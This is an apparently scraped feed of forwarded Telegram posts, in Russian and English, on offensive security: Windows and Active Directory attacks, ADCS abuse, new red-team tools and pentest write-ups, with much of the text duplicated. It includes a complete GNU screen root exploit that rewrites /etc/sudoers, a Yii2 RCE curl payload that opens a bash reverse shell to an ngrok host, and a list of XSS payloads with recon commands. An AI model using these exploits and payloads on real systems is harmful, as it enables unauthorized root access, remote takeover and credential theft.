Forwarded from 1N73LL1G3NC3
CVE-2025-21204: LPE in Windows Update Stack
A local privilege escalation flaw in the Windows Update Stack. By abusing directory junctions or symbolic links, attackers can hijack trusted paths accessed by SYSTEM-level processes like MoUsoCoreWorker.exe and execute arbitrary code with elevated privileges.
Blog: https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/
A local privilege escalation flaw in the Windows Update Stack. By abusing directory junctions or symbolic links, attackers can hijack trusted paths accessed by SYSTEM-level processes like MoUsoCoreWorker.exe and execute arbitrary code with elevated privileges.
Blog: https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/
🔥2
Forwarded from RedTeam brazzers (Pavel Shlundin)
report.pdf
40.2 KB
Coverage (Покрытие).
Начну с базы, даже с двух:
1. В 95% случаев получить права админа домена не сложно, и чаще всего это занимает не более 2 часов;
2. Большинство заказчиков хочет не просто пентест, а ПОКРЫТИЕ (т.е. что бы нашли и описали как можно больше уязвимостей и векторов).
И вот у каждого из нас наступает день, когда у заказчика 4 разных домена, куча разных целей и уязвимостей в смежных системах. Сделать хорошее покрытие нет ни сил ,ни времени, ни желания... Лично я в любом случае всегда собираю для каждого домена ldapdomaindump, secretsdump NTDS.DIT (если заказчик согласовал, без разрешения так делать не стоит), и в принципе этих данных достаточно что бы найти множество багов после проекта, на этапе подготовки отчета:
1. Kerberoasting;
2. As-Rep Roasting;
3. Проверить есть ли пароли в дескрипшинах у пользователей;
4. Подсветить опасные реюзы паролей у привилегированных пользователей;
5. Чекнуть возможность проведения атаки Pre2k (это неплохой вектор начального доступа, но когда права админа домена в кармане, не хочется проверять такие базовые, но опасные уязвимости)
6. Включенное обратимое шифрование в базе NTDS.DIT;
7. Неограниченное делегирование;
8. Слабые пароли и сколько их в домене
и много-много других...
Специально для решения этой задачи я написал небольшой скрипт на Python, который распарсит ldd, dump и brute и сделает удовлетворительное покрытие. На выходе мы получаем отчет в формате MarkDown. Каждая уязвимость описывается отдельно в папке modules по следующему правилу. Вы можете легко дописать множество своих проверок или удобно поменять текущие. Пример отчета прикладываю к посту.
Начну с базы, даже с двух:
1. В 95% случаев получить права админа домена не сложно, и чаще всего это занимает не более 2 часов;
2. Большинство заказчиков хочет не просто пентест, а ПОКРЫТИЕ (т.е. что бы нашли и описали как можно больше уязвимостей и векторов).
И вот у каждого из нас наступает день, когда у заказчика 4 разных домена, куча разных целей и уязвимостей в смежных системах. Сделать хорошее покрытие нет ни сил ,ни времени, ни желания... Лично я в любом случае всегда собираю для каждого домена ldapdomaindump, secretsdump NTDS.DIT (если заказчик согласовал, без разрешения так делать не стоит), и в принципе этих данных достаточно что бы найти множество багов после проекта, на этапе подготовки отчета:
1. Kerberoasting;
2. As-Rep Roasting;
3. Проверить есть ли пароли в дескрипшинах у пользователей;
4. Подсветить опасные реюзы паролей у привилегированных пользователей;
5. Чекнуть возможность проведения атаки Pre2k (это неплохой вектор начального доступа, но когда права админа домена в кармане, не хочется проверять такие базовые, но опасные уязвимости)
6. Включенное обратимое шифрование в базе NTDS.DIT;
7. Неограниченное делегирование;
8. Слабые пароли и сколько их в домене
и много-много других...
Специально для решения этой задачи я написал небольшой скрипт на Python, который распарсит ldd, dump и brute и сделает удовлетворительное покрытие. На выходе мы получаем отчет в формате MarkDown. Каждая уязвимость описывается отдельно в папке modules по следующему правилу. Вы можете легко дописать множество своих проверок или удобно поменять текущие. Пример отчета прикладываю к посту.
Forwarded from Offensive Xwitter
😈 [ Toffy @toffyrak ]
I have just released my first tool: GPOHound 🚀
GPOHound is an offensive tool for dumping and analysing GPOs. It leverages BloodHound data and enriches it with insights extracted from the analysis.
Check it out here:
🔗 https://github.com/cogiceo/GPOHound
🐥 [ tweet ]
I have just released my first tool: GPOHound 🚀
GPOHound is an offensive tool for dumping and analysing GPOs. It leverages BloodHound data and enriches it with insights extracted from the analysis.
Check it out here:
🔗 https://github.com/cogiceo/GPOHound
🐥 [ tweet ]
Forwarded from Offensive Xwitter
😈 [ Alex Neff @al3x_n3ff ]
A new module has been merged into NetExec: change-password🔥
Accounts with
You can also abuse ForceChangePassword to reset another user's password.
Made by @kriyosthearcane, @mehmetcanterman and me.
🐥 [ tweet ]
A new module has been merged into NetExec: change-password🔥
Accounts with
STATUS_PASSWORD_EXPIRED aren't a problem anymore, just reset their password.You can also abuse ForceChangePassword to reset another user's password.
Made by @kriyosthearcane, @mehmetcanterman and me.
🐥 [ tweet ]
вьетнамские флешбеки 5летней давности - https://snovvcra.sh/2020/10/31/pretending-to-be-smbpasswd-with-impacket.htmlForwarded from 1N73LL1G3NC3
EvilentCoerce
A PoC tool that triggers the ElfrOpenBELW procedure in the MS-EVEN RPC interface (used for Windows Event Log service), causing the target machine to connect to an attacker-controlled SMB share. If antivirus software (e.g., Defender) is present, it may scan the file and unintentionally leak NetNTLMv2 credentials, which can be relayed via ntlmrelayx.
Blog: https://habr.com/ru/companies/tomhunter/articles/907068/
A PoC tool that triggers the ElfrOpenBELW procedure in the MS-EVEN RPC interface (used for Windows Event Log service), causing the target machine to connect to an attacker-controlled SMB share. If antivirus software (e.g., Defender) is present, it may scan the file and unintentionally leak NetNTLMv2 credentials, which can be relayed via ntlmrelayx.
Blog: https://habr.com/ru/companies/tomhunter/articles/907068/
👍1
Forwarded from Pentest Notes
🚨Очередная критическая RCE уязвимость в модулях Bitrix (BDU:2025-03006)
На этот раз уязвимость нашли в плагинах «Экспорт/Импорт товаров в Excel». Эксплуатация уязвимости позволяет выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса.
Данной RCE уязвимости потенциально подвержены более 6000 веб-ресурсов.
Критичность - 8,8/10 CVSS 3.0
Подробнее рассказал тут
#bitrix #rce
💫 @pentestnotes
На этот раз уязвимость нашли в плагинах «Экспорт/Импорт товаров в Excel». Эксплуатация уязвимости позволяет выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса.
Данной RCE уязвимости потенциально подвержены более 6000 веб-ресурсов.
Критичность - 8,8/10 CVSS 3.0
Подробнее рассказал тут
#bitrix #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from GISCYBERTEAM
⚠️ SQL-инъекция в WordPress плагине Slider & Popup Builder by Depicter
Обнаружена SQL-инъекция в популярном WordPress-плагине Slider & Popup Builder by Depicter, установленном на более чем 100 000 сайтов.
📈 CVSS рейтинг: 7.5 (High)
📍 Уязвимый компонент:
🧨 Возможности атакующего:
- Инъекция произвольных SQL-запросов
- Извлечение всех хэшей паролей (
- Потенциальный офлайн брутфорс
- Извлечение данных без аутентификации
🔬 Proof-of-Concept уже находится в открытом доступе.
Обнаружена SQL-инъекция в популярном WordPress-плагине Slider & Popup Builder by Depicter, установленном на более чем 100 000 сайтов.
📈 CVSS рейтинг: 7.5 (High)
📍 Уязвимый компонент:
/wp-admin/admin-ajax.php — параметр s в одном из обработчиков AJAX-запросов.🧨 Возможности атакующего:
- Инъекция произвольных SQL-запросов
- Извлечение всех хэшей паролей (
user_pass из wp_users)- Потенциальный офлайн брутфорс
- Извлечение данных без аутентификации
🔬 Proof-of-Concept уже находится в открытом доступе.
GitHub
GitHub - datagoboom/CVE-2025-2011: PoC for CVE-2025-2011 - SQLi in Depicter plugin <= 3.6.1
PoC for CVE-2025-2011 - SQLi in Depicter plugin <= 3.6.1 - datagoboom/CVE-2025-2011
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Несколько часов назад была сильно обновлена утилита certipy. Обратим внимание, что в документации также появилось описание техники ESC16...
#redteam #pentest #ad #adcs
#redteam #pentest #ad #adcs
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Forwarded from 1N73LL1G3NC3
CVE-2025-23395 Screen LPE exploit
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
#!/bin/sh
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
👍2🔥1
Forwarded from Offensive Xwitter
😈 [ mpgn @mpgn_x64 ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥
🔗 https://github.com/Pennyw0rth/NetExec/pull/702
🐥 [ tweet ][ quote ]
Forwarded from Offensive Xwitter
😈 [ David Kennedy @Cyb3rC3lt ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
Forwarded from Proxy Bar
CVE-2024–58136 — RCE PoC
*
Yii2 Framework
*
Yii2 Framework
curl -k -X POST https://sub.domain.tld/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'
Forwarded from PurpleBear (Vadim Shelest)
Всем привет!
После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...
В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про
Вообще
💥Таким образом
✅ Распространенная уязвимость
✅ Дает серьезный импакт в определенных условиях
✅ Автоматизация поиска и эксплуатации
❓Как искать?
✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью:
🔧 Paramspider - использует
🔧 Gospider - довольно быстрый веб краулер на Go
✅ Объединяем и сортируем выхлопы в один файлик:
✅ Определяем живые хосты с помощью httpx
✅ Сортируем выхлоп по расширениям:
✅ Ищем отраженные параметры с помощью:
🔧 Dalfox
✅ Определяем отраженный контекст:
🔖 Reflected Between HTML Tags
🔧 Используем полезную нагрузку:
🔐 Reflected Inside HTML Tag Attributes
🔧 Используем полезную нагрузку:
📜 Reflected Inside JavaScript
🔧 Используем полезную нагрузку:
✅ Сдаем багу
✅ Вы великолепны💸
После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...
Reflected XSS😂В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про
XSS, только контекст обычно зависит от грейда кандидата.Вообще
XSS-кам, как классу уязвимостей предcказывали быструю смерть еще в 2014, когда Content Security Policy 2.0 стал фактически стандартом, но в классификации OWASP-10 от 2021 года XSS уверенно удерживает 3-е место на ряду с другими инъекциям, посмотрим как ситуация изменится в этом году.💥Таким образом
XSS:✅ Распространенная уязвимость
✅ Дает серьезный импакт в определенных условиях
✅ Автоматизация поиска и эксплуатации
❓Как искать?
✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью:
🔧 Paramspider - использует
web.archive.org для поиска url доменов из спискаparamspider -l targets.txt🔧 Gospider - довольно быстрый веб краулер на Go
gospider -S targets.txt -a -w -r --js --sitemap --robots -d 2 -c 10 -t 20 -K 10 \
--blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg|js|dat|pdf|webp|woff|woff2|tif|ttf|tiff2)" \
-q | tee gospider-out.txt✅ Объединяем и сортируем выхлопы в один файлик:
cd paramspider/output
cat *.txt > paramspider_out.txt
cat paramspider_out.txt | sort -u | tee tragets_url.txt✅ Определяем живые хосты с помощью httpx
httpx -l tragets_url.txt --threads 250 -o live_tragets_url.txt✅ Сортируем выхлоп по расширениям:
cat live_tragets_url.txt | grep -i -e '\.php$' | tee live_tragets_url_php.txt
cat live_tragets_url.txt | grep -i -e '\.asp$' | tee live_tragets_url_asp.txt
cat live_tragets_url.txt | grep -i -e '\.aspx$' | tee live_tragets_url_aspx.txt
cat live_tragets_url.txt | grep -i -e '\.jsp$' | tee live_tragets_url_jsp.txt
cat live_tragets_url.txt | grep -i -e '\.do$' | tee live_tragets_url_do.txt✅ Ищем отраженные параметры с помощью:
🔧 Dalfox
dalfox file live_tragets_url_jsp.txt --skip-xss-scanning -o live_tragets_url_jsp_reflecting.txt✅ Определяем отраженный контекст:
🔖 Reflected Between HTML Tags
<p>"><zxcvbro>Bro</p>🔧 Используем полезную нагрузку:
<img src=x onerror=prompt(1)>
<details open ontoggle=prompt(origin)>
<svg onload=confirm(1)>🔐 Reflected Inside HTML Tag Attributes
<input value="><zxcvbro>Bro">🔧 Используем полезную нагрузку:
" autofocus onfocus=alert(document.domain) x="
"><script>alert(1)</script>📜 Reflected Inside JavaScript
<script>
var input = '"><zxcvbro>Bro';
</script>🔧 Используем полезную нагрузку:
';alert(1)//
'-alert(1)-'
</script><img src=1 onerror=alert(1)>✅ Сдаем багу
✅ Вы великолепны💸
GitHub
GitHub - devanshbatham/ParamSpider: Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing
Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing - GitHub - devanshbatham/ParamSpider: Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/f...
Ого, какой крутой вектор атаки выстроил т.н. "белый хакер" @baksist!
🤯1
Forwarded from YAH
Как цепочка классических багов может привести к полной компрометации
Мой коллега из Singleton Security, старший спец. по анализу защищенности @baksist выкатил на Хакере прикольный разбор пентеста интернет-провайдера.
Типичная грустная ситуация для пентестеров, которым достался маленький скоуп (всего 9 IP), переросла в неплохешную цепочку багов, приведших к компрометации серверов провайдера.
Внутри — полный сборник трешовых ошибок разрабов, которые классно склеились во что-то единое:
— LFR через кривой rewrite
— MD5-хеши без соли
— повторы паролей
— самописная ERP с PTRAV при аплоаде
— отсутствие нормальной изоляции между сервисами
🧂 Про соль отдельно. Когда хранят MD5 без соли, это как хранить ключи в конверте с подписью «ключи от дома». Нравоучать не буду, разрабов которые в 2025 юзают MD5 для хранения паролей проще просто пристрелить и купить подписку на ChatGPT за 20$.
Рекомендую, кайфово почитать прохладную про блуждания хакера в PHP сервисах:
https://xakep.ru/2025/05/22/provider-case/
baksist, респект 💪
Мой коллега из Singleton Security, старший спец. по анализу защищенности @baksist выкатил на Хакере прикольный разбор пентеста интернет-провайдера.
Типичная грустная ситуация для пентестеров, которым достался маленький скоуп (всего 9 IP), переросла в неплохешную цепочку багов, приведших к компрометации серверов провайдера.
Внутри — полный сборник трешовых ошибок разрабов, которые классно склеились во что-то единое:
— LFR через кривой rewrite
— MD5-хеши без соли
— повторы паролей
— самописная ERP с PTRAV при аплоаде
— отсутствие нормальной изоляции между сервисами
🧂 Про соль отдельно. Когда хранят MD5 без соли, это как хранить ключи в конверте с подписью «ключи от дома». Нравоучать не буду, разрабов которые в 2025 юзают MD5 для хранения паролей проще просто пристрелить и купить подписку на ChatGPT за 20$.
Рекомендую, кайфово почитать прохладную про блуждания хакера в PHP сервисах:
https://xakep.ru/2025/05/22/provider-case/
baksist, респект 💪
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Полный гайд по эксплуатации ADCS от ESC1 до ESC16. Понятно, что материалов по этой теме и так много, но пусть будет под рукой))
https://xbz0n.sh/blog/adcs-complete-attack-reference
#ad #adcs #privesc #pentest #redteam
https://xbz0n.sh/blog/adcs-complete-attack-reference
#ad #adcs #privesc #pentest #redteam
xbz0n.sh
Breaking ADCS: ESC1 to ESC16 Attack Techniques
Let's talk about Active Directory Certificate Services. If you've been doing red team work for any length of time, you've probably heard about ADCS attacks. ...